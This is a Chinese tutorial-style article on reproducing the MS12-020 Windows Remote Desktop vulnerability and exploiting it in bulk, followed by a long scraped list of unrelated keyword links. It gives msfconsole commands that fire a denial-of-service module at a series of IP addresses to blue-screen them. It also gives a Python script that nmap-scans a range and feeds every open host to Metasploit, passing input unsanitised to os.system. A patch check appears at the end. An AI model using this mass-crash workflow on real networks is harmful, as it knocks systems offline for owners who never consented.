MS12-020漏洞复现及自动化批量利用
发表于:2025-12-02 作者:千家信息网编辑
千家信息网最后更新 2025年12月02日,漏洞描述Windows 远程桌面协议漏洞,可执行代码,POC可导致蓝屏。(RDP远程桌面执行代码漏洞)影响目标Windows XP sp3Windows xp sp2Windows Vista sp2
千家信息网最后更新 2025年12月02日MS12-020漏洞复现及自动化批量利用
漏洞描述
Windows 远程桌面协议漏洞,可执行代码,POC可导致蓝屏。(RDP远程桌面执行代码漏洞)影响目标
Windows XP sp3Windows xp sp2Windows Vista sp2Windows 7Windows Server 2003Windows Server 2008Windows Server 2008 R2msfpayload利用
msfconsoleuse auxiliary/dos/windows/rdp/ms12_020_maxchannelidsset rhost run 此pyload仅支持单目标。
通过msfconsole快速启动
msfconsole -x "use auxiliary/dos/windows/rdp/ms12_020_maxchannelids;set rhost 10.129.10.10;run;set rhost 10.129.10.37;run;set rhost 10.129.10.169;run;set rhost 10.129.10.209;run;set rhost 10.129.10.232;run;"通过bash脚本批量生成检测脚本(nmap-port2ip.py)
#encoding:utf-8import xml.saximport sysimport osclass MovieHandler( xml.sax.ContentHandler ): def __init__(self, filterport=None): self.CurrentData = "" self.port=filterport self.data = "" self.datas=[] # 元素开始事件处理 def startElement(self, tag, attributes): self.CurrentData = tag if tag == "address": self.data=attributes["addr"] # 元素结束事件处理 def endElement(self, tag): if self.CurrentData == "address": self.datas.append(self.data) self.data="" self.CurrentData = ""class Gather(object): def __init__(self, filterport=None): # 创建一个 XMLReader self.parser = xml.sax.make_parser() # turn off namepsaces self.parser.setFeature(xml.sax.handler.feature_namespaces, 0) # 重写 ContextHandler self.Handler = MovieHandler(filterport) self.parser.setContentHandler( self.Handler ) def run(self, port): self.Handler.datas=[] self.parser.parse(port+".xml") print(self.Handler.datas) def get_ans(self): return self.Handler.datasif __name__ == "__main__": if len(sys.argv) !=3: os.exit() os.system("nmap "+sys.argv[1]+" -p "+sys.argv[2]+" --open -oX "+sys.argv[2]+".xml") g = Gather() g.run(sys.argv[2]) # create cmd cmd = '"use auxiliary/scanner/rdp/ms12_020_check;set threads 20;' ips = g.get_ans() if len(ips)>0: for ip in g.get_ans(): cmd += "set rhosts "+ip+";run;" cmd += 'exit;"' os.system("msfconsole -x " + cmd)# 使用方法python nmap-port2ip.py # 功能:针对某种服务的漏洞对指定IP段的所有主机进行检测,获取可能存在问题的主机IP,并调用对应的Msf Payload进行利用尝试。# ip可支持单一IP、CIDR形式IP、10.129.1.1-154等几种,格式与nmap一致# port仅支持单端口 漏洞补丁检测
systeminfo | find /i "KB2621440"如果存在结果如下,证明已打补丁,否则,需要打对应的补丁。Windows Server 2003补丁
参考文章
- 微软MS12-020
漏洞
补丁
支持
检测
主机
事件
代码
元素
桌面
目标
脚本
处理
一致
使用方法
功能
形式
文章
方法
格式
端口
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
一级安全服务器
移动集采服务器cpu
苹果数据库连接出错
腾达路由器 虚拟服务器
万德金融数据库高校
育碧地服务器
打印机服务器不能提供服务
山西网络技术转让销售价格
电脑作为代理服务器
深圳家政软件开发订制
黑龙江利末记互联网科技
qt向数据库表插入数据
智联互联网络技术专业
共青团网络安全宣传员
软件开发的风险
网络安全法全员答题答案
免费服务器虚拟化
綦江区网络安全审计系统咨询
软件开发技术分多少级
服务器上的蓝色显示屏
简述数据库定义以及作用
旺旺黑号数据库免费分享
启飞网络安全ppt
匿名者服务器宕机
商用笔记本 软件开发
适合新手的pc软件开发项目
数据库中的从属关联
江苏网络安全 省委书记
地铁逃生显示服务器已满怎么办
云顶之弈手游 服务器